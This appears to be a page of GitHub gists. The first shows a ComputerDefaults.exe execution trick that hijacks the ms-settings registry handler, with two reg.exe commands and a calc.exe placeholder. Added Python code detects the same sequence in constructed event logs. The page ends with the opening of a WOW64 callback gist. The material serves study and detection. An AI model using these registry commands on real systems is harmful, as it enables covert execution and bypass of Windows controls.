@havoc3-3
havoc3-3 / lolbin_execution.md
Last active November 7, 2025 05:58
Proxied Execution techniques utilizing registry hijacks.

Proxied Execution via ComputerDefaults.exe Using ms-settings Registry Hijacking

Step 1: Create or modify the registry key

reg.exe add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /ve /d "C:\Windows\System32\cmd.exe /c C:\Windows\System32\calc.exe" /f

reg.exe add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f

Step 2: Execute ComputerDefaults.exe

This triggers the execution of calc.exe through the hijacked ms-settings handler:

C:\Windows\System32\ComputerDefaults.exe
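
A detection-side view of the two steps above, as an added example that is not part of the original gist: it flags writes to the per-user ms-settings\Shell\open\command key and correlates them with a following ComputerDefaults.exe launch and its child processes. The event dictionaries, their field names and the five-minute window are assumptions, and the sample events are constructed.

```python
import re
from datetime import datetime, timedelta

# Handler key from the gist; telemetry may report HKCU\Software\Classes as HKU\<SID>_Classes.
HANDLER_KEY = re.compile(r"\\ms-settings\\shell\\open\\command(\\|$)", re.I)
WINDOW = timedelta(minutes=5)  # assumed correlation window
LOLBIN = r"\computerdefaults.exe"

# Constructed sample events; field names are assumptions, not a real log schema.
EVENTS = [
    {"time": "2025-01-01T10:00:00", "type": "reg_set", "user": "alice",
     "target": r"HKU\S-1-5-21-1111_Classes\ms-settings\Shell\open\command\(Default)",
     "details": r"C:\Windows\System32\cmd.exe /c C:\Windows\System32\calc.exe"},
    {"time": "2025-01-01T10:00:01", "type": "reg_set", "user": "alice",
     "target": r"HKU\S-1-5-21-1111_Classes\ms-settings\Shell\open\command\DelegateExecute",
     "details": "(Empty)"},
    {"time": "2025-01-01T10:00:05", "type": "proc", "user": "alice",
     "image": r"C:\Windows\System32\ComputerDefaults.exe", "parent": r"C:\Windows\System32\cmd.exe"},
    {"time": "2025-01-01T10:00:06", "type": "proc", "user": "alice",
     "image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\System32\ComputerDefaults.exe"},
    {"time": "2025-01-01T11:00:00", "type": "reg_set", "user": "bob",
     "target": r"HKU\S-1-5-21-2222\Software\Example\Settings\Theme", "details": "dark"},
    {"time": "2025-01-01T12:00:00", "type": "proc", "user": "bob",
     "image": r"C:\Windows\System32\ComputerDefaults.exe", "parent": r"C:\Windows\explorer.exe"},
]

def detect(events):
    """Return one finding per user whose ms-settings handler key was written."""
    findings = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if ev["type"] == "reg_set" and HANDLER_KEY.search(ev["target"]):
            f = findings.setdefault(ev["user"], {"user": ev["user"], "command": None,
                "delegate_execute": False, "triggered": False, "children": []})
            f["last_write"] = ts
            if ev["target"].lower().endswith("delegateexecute"):
                f["delegate_execute"] = True   # step 1, second reg.exe command
            else:
                f["command"] = ev["details"]   # step 1, default value of the key
        elif ev["type"] == "proc" and ev["user"] in findings:
            f = findings[ev["user"]]
            if ts - f["last_write"] > WINDOW:
                continue                       # too long after the write to correlate
            if ev["image"].lower().endswith(LOLBIN):
                f["triggered"] = True          # step 2: ComputerDefaults.exe started
            elif ev["parent"].lower().endswith(LOLBIN):
                f["children"].append(ev["image"])  # process spawned via the handler
    for f in findings.values():
        f.pop("last_write")
    return list(findings.values())
```

A finding with `delegate_execute` and `triggered` both set, plus a non-empty `children` list, corresponds to the full sequence described in the gist; a lone ComputerDefaults.exe launch with no preceding key write is not reported.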

@odzhan
odzhan / wow64.cpp
Last active March 30, 2026 18:02
WOW64 Callbacks
//
// How to locate the WOW64 Callback Table in ntdll.dll
//
// @modexpblog
//
#define PHNT_VERSION PHNT_VISTA
#include <phnt_windows.h>
#include <phnt.h>